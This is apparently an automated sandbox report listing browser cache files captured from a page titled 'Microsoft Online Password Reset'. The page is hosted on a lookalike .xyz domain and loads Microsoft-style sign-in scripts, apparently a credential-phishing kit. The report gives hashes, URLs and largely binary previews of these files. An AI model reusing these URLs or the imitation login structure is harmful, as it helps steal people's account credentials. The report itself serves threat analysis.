                                          Preview:.paddingright { padding-right: 20px; }...paddingleft { padding-left: 20px; }...paddingright7 { padding-right: 7px; }...paddingleft7 { padding-left: 7px; }...paddingleft10 {padding-left: 10px; }...alignright { text-align: right; }...alignleft { text-align: left; }...leftalign {text-align: left; margin-left:0px;}.....borderRight {border-right: 1px solid black; padding: 0px;}.....userTypeRadioButtonMargin{margin-left: 10px; margin-top:50px;}...userVerificationInputLabel {text-align:left;padding-right: 10px;}...radioButtonMoreInformation { padding-left: 20px }.....header .logo{float:left; padding-left:30px;}.....HelpCallout td.PosRight{padding: 8px 0px 0px 0px; margin: 0px; vertical-align: top; font-size: 1px; border: none !important; background-color: transparent !important;}...HelpCallout td.PosRight > div{font-size: 1px; position: relative; left: 1px; border-bottom: none !important; border-right: none !important; border-left: none !important; width: 15px; background-color: transparent !

                                          Chrome Cache Entry: 114

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (941), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):51661
                                          Entropy (8bit):4.652472751486279
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:5B4CF23C6F6D0EB1E95E3EA8A81FA3DB
                                          SHA1:30AB813027A11181E106EC6C6DB0B8C123F51F95
                                          SHA-256:C25E2A942969FB361CC4B9F7933702BF7101076DB08790B1B9F4B7CDB221BA49
                                          SHA-512:B02CDC61E20A82DD1C1AD0C17D79D29423964E5B741AB61065642926376351027559957B7A6C9771E623634AD1DE546CF17264A570E4C596AB1A13A41142BB72
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">..<head><title>...Microsoft Online Password Reset..</title><meta http-equiv="x-ua-compatible" content="IE=9" /><meta http-equiv="Expires" content="0" /><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Cache-Control" content="no-store, no-cache" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="robots" content="noindex, nofollow, NOODP, NOYDIR" /><meta name="viewport" content="width=device-width, initial-scale=1" /><link id="FavoriteIcon" rel="Shortcut Icon" type="image/x-icon" href="../favicon.ico?v=1342177280" />.... <script src="//2ac4b5bb-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/ajax/jQuery/jquery-3.6.0.min.js" type="text/javascript"></script>.. <script type="text/javascript">window.jQuery || document.write('<script type="text/javascr

                                          Chrome Cache Entry: 117

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:GIF image data, version 89a, 352 x 3
                                          Category:dropped
                                          Size (bytes):2672
                                          Entropy (8bit):6.640973516071413
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:166DE53471265253AB3A456DEFE6DA23
                                          SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                          SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                          SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..

                                          Chrome Cache Entry: 119

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 3808
                                          Category:downloaded
                                          Size (bytes):1451
                                          Entropy (8bit):7.846590817928699
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:98E0F18648E5CB4C1B37D5977F8D24C0
                                          SHA1:26FB20115D2CDE21C0A0A19E61EDA18528990867
                                          SHA-256:AEAA2269BF734CD85EE464274E0ED55BC409E47899EB3D7CC61AB3C1477F5625
                                          SHA-512:0C9A0DA887F654D9D42FB01F54A931EF0D0CCBA25EC5E7E4D77F491DFD373DCAF4F4D953DAB23A5DA3B5D658A59E383093A010712AECC40046B9F90C74B08CBD
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://l1ve.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/Me.htm?v=3
                                          Preview:...........W]o.6.}.."..N..|.r..h;.E..U.=..@S..D.T.v.9....eu...}H,....\.{H...ej;....Yqk.......Y.....2Q.%.o.D;k.;.#UG`;1S*._..4d...V...(...c&j...+.:..+n.D[3..%....7....H..P.~..FU..C9.cG..D........n"+x...H.K..\N!.M)BD8=.9...Z.)dU..4..Sbh.(*.X..].......r.PJm%....)[."Q..[..U..v{.CD.l.&|...<In.pM.K...;...f...H...M.....Z.1..9.........'..#..{.....9|.a.......J... ..4.kV3c.Ts.......F.g..B..4Em-.....A...MU...k.&+..rI@.M.........).F..u..,dd..IW..R.iPo.......R.8........f.N1O..j%F.n........O.@S.-.CD..&D8V~..e%...q7...<.B...p7f{..)...ID..`JB..:.A'w....-3....%3.....\4.09.........E..l............'\A....&.I.......I...$...Y...qc..Xg%..uZb..,-....0.-fsC.8..a1.r...8...Y.Q..Y8..3...3.....Y.h.....M..K.....2..w......?..9...k....,.._....<..../..uu.-4.F.........4..]..%..o/h.2.<.....e.(hy.:...t.^..r..-....?.s.;.....2.@r....K.6......&.....D....l..WT..x.8T."..#Q~.......L...(1u6....~+.C..^Kbhw..F..L...$....aA...PL.i.2..A.@.......rr."i.4...E..d+g.a../.....%Qgk....x..

                                          Chrome Cache Entry: 121

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, original size modulo 2^32 379
                                          Category:downloaded
                                          Size (bytes):254
                                          Entropy (8bit):7.073949007476455
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:DE27409124B16BD9FD100A4541F14B54
                                          SHA1:071BBE8F6F76CFA82F1D565EB39899E56DC45313
                                          SHA-256:EFDBF66A9CC530152E00CEC6A67A9AD3BE5E392678CFD758671DFD72B0EDDD41
                                          SHA-512:E76D116B715763F5AE7528ADECB956CCE52D0EF920BBF05BC8E7BD04A559B08A9FE417AC05C5C3338571E25AFBE0C4C4D57A868A4E132E837179AAC5267FE824
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://a638d5a3-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/shared/1.0/content/images/picker_account_msa_3b879963b4f70829fd7a25cbc9519792.svg
                                          Preview:..........mP.n. ...D.xY0.\..{. 7...y.F!.....T..Y.Y..n...q^.[O}..w.SJ.j..3.....%)....x.f.K}..}\.=E.D....!.n.......Ma..G.=+.%.w..WX...9.A...........X...V...bOB&2.H....15{.fT...V-.#..m..f...V2<...~....l%4.....Ie.TL69.....vW.....v.3.v.O..}..{...

                                          Chrome Cache Entry: 122

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 190403
                                          Category:downloaded
                                          Size (bytes):61228
                                          Entropy (8bit):7.996143797222209
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:7B468040EC45597C5F38B1FC70892A04
                                          SHA1:29958B57F33405A2F5B65F8552310079D563C592
                                          SHA-256:9BC40353065A7294454D2FB384085778B585A80D8C049CA9ECF7118F313475E8
                                          SHA-512:97AC94B5D7F96AD90B11F558C95E27A839C5D5274F9869EFC4E3B34FBD06960F40986CAF2E1D2AB9B2CEDE3550B4212AD6AA1C64881EA094690EAD74A9546DB2
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://a638d5a3-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                                          Preview:...........iw.F.0.....'W..`...8..]Y.m..%.....l..I..@........A......'..4......Z.8..7.........L...Oy.L.._.../..t............Y..q.../..sf9k.E.G..M..[x~........g..T......e..eI#k...`{s..{a....<,...,.s..j...,.Y..=6g.....=...<....N.U..[-z....,.....<d.~R.,...,..k.....~g.e.......2L......$...l..,;F...0...?5.}.. -.8..b?L...yzKc{*1.h<....\'V..K.C.2.0....V..8...I..GY..HW.Y..|7.0..=f!...|GV..8.N......n8"+.......r..4n....]Q.+a..........._.....#.Ok....!..c...+.cne..y``.b...AU...w...e.h\/.MN..qu5.v.Q...j.e..0KNS..<..!.H..8....&.9.q..'...A..z...*NX........l<>....yFa~x.H.X..U........9.@........E....q..C....N.l..........9.4.c.H._.Y.....F.$...aV........%.U..64..0N...=..4.'5........L,..,...blA..,.&T.fjA...\..K.=...A..@..x.:....E.?9\..M..2..5........a.*.l..pZ.8......a...m........K.b;.]?..2m..... ...4..kV..El.0+V_lN...Uxtd.;+.....d7.d5......4...:..l.......f....6.:,.X....nj~..]...-S.........2;..W...Ka8..L.....c+G.n>........`....K{.`75l....Y.2../vj./.e..

                                          Chrome Cache Entry: 123

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 26954
                                          Category:downloaded
                                          Size (bytes):5479
                                          Entropy (8bit):7.9638991457717045
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:AA2C434CD228F2F66475A3DE6563810C
                                          SHA1:D973E6EA552AD17B5379CB44A0AEE3EBFBCA0EE7
                                          SHA-256:F86E52667175BF496752323AE014CAAA4DF7C6982727815BDAD5633CFF68BCA2
                                          SHA-512:17901669B003EB648488EFA820787D6F4D10FF90D72C6C3A2CB5BEBC0E74E5D96F3005C2957EB0B037856FEB5BD0F3DFBFA1BCEF3BFB6CA4ED207D618E140D05
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/ScriptResource.axd?d=VOVMn-1ji7ptewpNKKe04Ptic_v4sQOkJoNbFSKTCgnJsUDWSYIRw2xt1tvPsTxUYZhIRTaUX9U_dbj8uphXZ0fSg0RHKflqXhImoGV7W_at39wE7F7NNSnjODDdnBpjRydn5povagbPAE8o6JMPhrtPc-X0tGWW1sDlhdiAl_QNQ2pOijcJ10WZjkyvuUaxYB0v6dTbanr2kY0nL-clTw2&t=ffffffffa8ad04d3
                                          Preview:...........=.r.F...?.....l.H...b..e3F...n....]$1B.m.M.G...~...f.:..n9....#D4.2+.........mZE..k...i.M.&+..Y..E..g/.;.~.;...45..-.y9.t2..f..^.ym5....xX.MU...{S..5CT.<....9].X.mO..7..a...]YM....=.,..7.....U...i.?...%.....f..2/....5..).~.p.....o6..4O.<...y1F.DR.e...v|..<]..F.}......*.. ......D{ .....z....FG..}Y0..^.k.U..>|...zQ..l.#.u..Y.?.j..h?..HA...."..vg9R.[..Ez.]..F....5+.QVL....x..E.^F.[I.?.xz.N.......C.$..y...e.g...M6.....w.9..%.9.k....*.5..jN.x.8....mg...s..k....v....P...8.\!VQf.....8..7w.,.Z.Q.......{.$..}..%Y.kkJ.9.M.!..0..j..,?.g......n..f..!.G.U..AU..r.........5G9........k.ai}q...h.9.`.&..h...];m...)......[....}b.5...t.z..E.kqPp...?..t.r.ZO.....OG...N......V.....&.'.......2......L...]...6<.....9.. ...]....3IQJ..L..........\......l(<..b.g.On.y...A.`.w..._a..8.....4....74......vN.Y........T..8...3..D.. ...E..9Ck.c...K)<,..N.F...K..).^I|b.Y....A.r...m..............F...<(.?..f...W2.....qZ.Y~0.....G"..}..Yz..$".. %+f.EzR.#.^..:..I

                                          Chrome Cache Entry: 124

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:GIF image data, version 89a, 24 x 24
                                          Category:downloaded
                                          Size (bytes):2463
                                          Entropy (8bit):6.994052150121201
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:93DE6FB07C1382459E473381DA5D0E7E
                                          SHA1:4E1208D482A7ABA8C86FDCF8E0E92C90BB8C8C8A
                                          SHA-256:E97FA0CFE4B0A7BB22E9713A67D4667DA064E674A944D607E78F0D3BF48E57A5
                                          SHA-512:B415DE10B55639DD5DFDD038FD490B675059122373659DD86AA00EBC7F6735FD22360264226F8675741FB76F3B3A16E9AB7FA907F489B377EF16E9222AA26E3B
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/images/wait_animation.gif
                                          Preview:GIF89a.............!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:BCB95722648AE111A86BB806ED51E581" xmpMM:DocumentID="xmp.did:185F1A028B0511E19AA1A07B5BDC793D" xmpMM:InstanceID="xmp.iid:185F1A018B0511E19AA1A07B5BDC793D" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D7EC7F987A8AE111A86BB806ED51E581" stRef:documentID="xmp.did:BCB95722648AE111A86BB806ED51E581"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>......................................................................................................

                                          Chrome Cache Entry: 126

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 223956
                                          Category:downloaded
                                          Size (bytes):54457
                                          Entropy (8bit):7.9959068048468795
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:0B41F191B4963050D49A6DEE019B83F7
                                          SHA1:3047FEC81163505529FF0F4B0A37C23BE7EBD393
                                          SHA-256:6BA548B1B98F2165617ED806ED2F114A386D070C228E2200640835BA0F32FE8E
                                          SHA-512:0F16F29906C95D45689626114BAF8B2536E4E1337CF74F7D2226998729AC8ED271538DD15C72CCB6A414BFA9457B4CAEE391788078DFEA8FD9E1DAF97BF8994C
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://a638d5a3-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_8e14dcf0e3ff5580d170.js
                                          Preview:...........k{.F.0.}...gF.L."..eR..v.y.O....g.....M.1.pp.....~...@....d<...F./...u..{;........./.>..z.}...y....3x...OO_>y.....N..q.Z.K...Q..4i.Y+Nfi.J..`y.....h.Zd.U..d.U...fE.Z.y....e...As..,...g~..g.Z|.'..,]].....E<c.(.SkKxHr.*.9.Zo/..e..x..y.(Z.....t..Pnw.....rV..iV\.q.Z/..h5.nx.9U........&........*a..M.,.{. Tc8^{.."m].....O.\..nW9...9....=k.9......V....+....T...,J..;X.."c.%E..c...u+.Z.@hfA..E.Z.%.-5.6.YOn.V..<M.._.7......n...W.E..G{{.qqY...._..W._............,;......|u8..mo....(...^...{....O._s............6...D..@O..z&..),.......w?}....O...yo.d...-;_E....@\.....l..Ve~..O.....Lf8+..E..7o.....7......... .?.~....G......~.a.E..,.{/..v.....*..`.,.`O.c...G#.uw.."..d!......(X...*?h-..e..k....t/_...{..z....|.I...".......m.......7E.]...l9b.,..../.Wl.....B5..J...:.=.O..."(.+...h....9....h..X...y....Q.,3....'..+:. ......(e.2/..v.\t...(...x{...o.^..ab.AC...,C.3l..t..K/...{q.C.....v..n..6x..[..8.(P..I/=.......->N.s...5w....oW.....$....c

                                          Chrome Cache Entry: 127

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 89 x 18, 8-bit/color RGBA, non-interlaced
                                          Category:dropped
                                          Size (bytes):1805
                                          Entropy (8bit):7.265265285391204
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:BC89C1FBFBC227DC5A7ED9B2797E240D
                                          SHA1:8A9390297FDD0963C466CF2FD35D5B1F88A46B6A
                                          SHA-256:744A8CD0A4D15DFCF4A5D2E832FF556D950F8AF24D7B66104AB2EF4FE2605D9A
                                          SHA-512:C18F6B22F4AC5040E3FEBE8034AD3A3A3EF32CF3384BE6C3144B2EB04080F03111743D5B30AF3A1343AFD68A20AAE5972422C724107243D00CD9CF263DDC10C7
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:.PNG........IHDR...Y.........0.r.....sRGB.........gAMA......a.....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:BABFACAF901511E2BD4FDE5C526470CF" xmpMM:DocumentID="xmp.did:BABFACB0901511E2BD4FDE5C526470CF"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:BABFACAD901511E2BD4FDE5C526470CF" stRef:documentID="xmp.did:BABFACAE901511E2BD4FDE5C526470CF"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..R....fIDATXG.mq[1.E.!...3&...P.................3..~L..q.O..t..{...v?..n.....b#.-.i..

                                          Chrome Cache Entry: 128

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:GIF image data, version 89a, 352 x 3
                                          Category:dropped
                                          Size (bytes):3620
                                          Entropy (8bit):6.867828878374734
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:B540A8E518037192E32C4FE58BF2DBAB
                                          SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                          SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                          SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...

                                          Chrome Cache Entry: 129

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 447145
                                          Category:downloaded
                                          Size (bytes):121788
                                          Entropy (8bit):7.997540192258147
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:9C7CDA2A727581CD990D80998F3836A1
                                          SHA1:A8CD25856E11F7DB671DD8E037D55B57222232FE
                                          SHA-256:01D3F7C5A2EBE2E95D49638D41CAC413A2AD42384540096F9A5AEF88240776E3
                                          SHA-512:1900F665B848C6EAFAECD7116745D2A883E8735E2710515E184050815609EEA08BFAED97DDB473A2E5C373B77E29159E1BF9B1D348FCAE125F542E700CC4ABFC
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://a638d5a3-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/shared/1.0/content/js/ConvergedLogin_PCore_Kjlmc42uL0ATl_21eYcwVg2.js
                                          Preview:...........m[.H....~...1v#..7lQj...b.0...g).G..F.,y$..1..~...R........)..............O.....4..]...../g..+..{.rps.?..z.Q.......J.wd..-.A).J^...,...)..y._.G.<..,..dN..|/N....K...En......U...3..x..v....~LJA.x.+.K.....4.\..^.=.t.9Q....1.y..H<..|.z.X)fIi.F.#.G.4DHQkL...c...?{.T8...0@/....0h,...[U.DZ..7.R.....}6./...o.....:.;w.jn.1....._..<*..b.{.... ..J.....9.8{.16eA...........:B#.K,N...8.T.....$.R..8...?.R.^3...n...$......K...4...?M......Sg..7.~nE.hR.?..Y....k.....at.........r...y..i...#.d.8..^ .s.N.Yn.....`.$..,.ZB'......+hok<...X.U..w)(...F.g..G.....j.z...{=.j.c......I.x...T<+.......V..$.....>...%.....[...(.W.....m.:..e..V*:..j......U...HO..2.K....P......9pdO+N5~..I.R.,....R..E.i..).BD.7.{w.}%b.<.J.....k5>...&Y...t..2t.i....Q.a!.c"....+..[[.,my*z..z....{9.zQd.).1.W}C.K.b..&..-...1-.J......K..RO....m......N..&.....8Wi...T\.8`{.3.B...DL}4..R.u........`?....W`Z".S.S..<= ....V...n."..*}..+.{0...._..A%..L...I)UX...)y..P.......G.....z.O?'

                                          Chrome Cache Entry: 130

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 141535
                                          Category:downloaded
                                          Size (bytes):49781
                                          Entropy (8bit):7.994898479812402
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:1F47654B448FF1C7BE0450BD4E5B6AD2
                                          SHA1:1BF579482CDFA80BAA7FBB19780EB88A0D7FC22D
                                          SHA-256:04AB3367C7AD4781D352D96685CDFB2A98044B1559AFB353B8783BB8CD935074
                                          SHA-512:726F7F71C45D76B2E11BC100D6BA4BBD4377F79CD04B8E1852E402E193FDBAD5340F5C55CB137601E9E7D49DDFEE227C24AF367F69948C4CE25AC29D56D56456
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://a638d5a3-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/shared/1.0/content/js/BssoInterrupt_Core_sw-M8KkV3_nBot-G1ImRcw2.js
                                          Preview:...........k[.0.}.....OL..hppg...f..C`..X<N.........9...E.e.{.z.......,..JU.......T~..}.?..y....X9.|x._9..?*'......?.....qe.OD.~.n,.J.T....0......r..#.T.Qx_I.De.._.(.+.?N..PL..J......%..S........(=....|.T.0.G.....6.. ..Y....x..*..(..p.T"1...|$.Az..V.D%.Ie.F....^. ..5....c...?..T8..._..b..3.4....s]kDZ..7.J.V..l}..?.....c...g.A...(.......8.TB..*....^.OS..'.......s0p.m$.....'.....O.!.3.".$.N...*..cQWdP.|..U..W..Fsk....h..u.$..^_.....~...._.[_._...=..y.>lF..5..}...^....u/..N..z7........O..\.........~x...j.>@...:U...R...}...N..[.B.Z_...6.*...\.....Q....".w.....O....5s..;._...6.....9.e|m...Xu .$L...~.....P2.@o...G5."su5...WWg..,....|...it...Pw.5..J.J...L.....T.huu....TK.Y=...I..s.A.en..K.n.;).|.?.F.....d...|..%....*.`....5.W..._..,$..51Qe...}.^&.J#K......<......8.(r......ZR..G.zc.wc.A.pL.h&w..@<V.!. ..w.:+k..n..7..IJ. .*..X.S....p"....8....v...[M.0..q..c;.....0*..*.8.......t.\...n "..km..S...W..].k.+0.....P.V...4-W.C...;7-/.Q;.w......k.z+..

                                          Chrome Cache Entry: 131

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 40329
                                          Category:downloaded
                                          Size (bytes):9984
                                          Entropy (8bit):7.979200972475404
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:1F2EFD65E8F5FAB8BDB4C5C58B5266CD
                                          SHA1:DC0CF6C1245542368256F2BC455834F2BD2D82C2
                                          SHA-256:B5ACEFB479F59D7954C3BD57DD769C4D489248C846186B7CBC3FDED601C3FD95
                                          SHA-512:EBFECF2564AC3C0983578C8F59778D5E1AD21D1443BCAE14346E5DB1240990602CFFB92EC2FD8BF67933598DF5B8768EE4349BDAB7073A9FD7C8A7BD7A1DC91C
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/ScriptResource.axd?d=T0dtiwsjKq8gW-fIsAHJyvGnpZPh0iXezm0u3NfytbZ6-6TsiMM-tLKg1veJyjBNY_R3eWGKT7hbAEM4dL48sjZhOiEgfu5nu9KBaaEColWX9lEPD8FaiJMJS9w3E0b_PCJJB-U0Q-uXF00jBspnQFP7Izh7xg73UEYI_OsFKGUjtvZWehapPNjhxxovc4Gqlv_ui3xC40LE2RSikyfhYXQGc5YVZsDGR9yE_8mcw2o1&t=74258c30
                                          Preview:...........}ks.H......@a{ebU......h.^.._a..3!k...HB....m.%....?i..e..U@.........wefefefU........O.....?8).we:...?x..eQ.....EQ.:-.`p.e.^....b.W..X.........UQ.......,...4.jV~..tQ........`......Y..,.]........sR..E...M....\.c>H5.t......xW.jt.?6?.c(..`_....B.G..'.<.1.c....o...yZ..cZ.a=K+....l.l...EQ..4.=......L_..Z..4gYuQ|._!]m1.`Q.uQ....)..=..|.....2.8G."XY.......]c..*|xT....3@..?..Zm..E.'..*......2..E gy..<(.Z...8XY..4O2....U...4.0..5.W!}x._i.`.T,.V.G...b/.t..j>...<.((....,."Uo5X}.@QE.b.khU.h...>...Q~=.k.?.....o.0k........GM..X......P^G....=..<fY.U..S....K....H..9:*......'...J=).O....#G[m...30k...j.2+.im.(Km3.uxv._.pT.4.>..f.-..UZ.=e...C....._5..xR.:..\U..jR. .....9A..1:1.......a..2...U......YTP..`...l0.9.t.}.'.p.c3q.. {m.,...G1..".L.Aj@.D.h.p......fZ{...eYB......1.Ep.b&..% .c.._i9.).,.eD.'...`.E.i..M3#+6...9+....B..NYB..%..8..?....zv.r..XP..W.../+..e.N........Z..i..... ....4I..iR...8+.>....k...N?....MA.....uU...&...Xyb..u*..H....%.

                                          Chrome Cache Entry: 132

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 55503
                                          Category:downloaded
                                          Size (bytes):15942
                                          Entropy (8bit):7.985848663515711
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:E488D353476FAC6C93E6056EDF1B04E2
                                          SHA1:69BFEF9AAFE0F7543ED36FB26F558C769EF97BEF
                                          SHA-256:EB3C57E120B75B045A09F177C61420DD4BF785613185D253C0D8F53DC6474CE3
                                          SHA-512:A805573E08E5F4D0D5088D15916E3BDA54036700E875F249541CB1CF9F26172B0ECD6D20E71625CDDF275F9D8270DC4DC6443C4884AEA71DE50C0FC6098DA716
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://a638d5a3-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_fo8rkc18qnhjh4wnzabsdg2.js
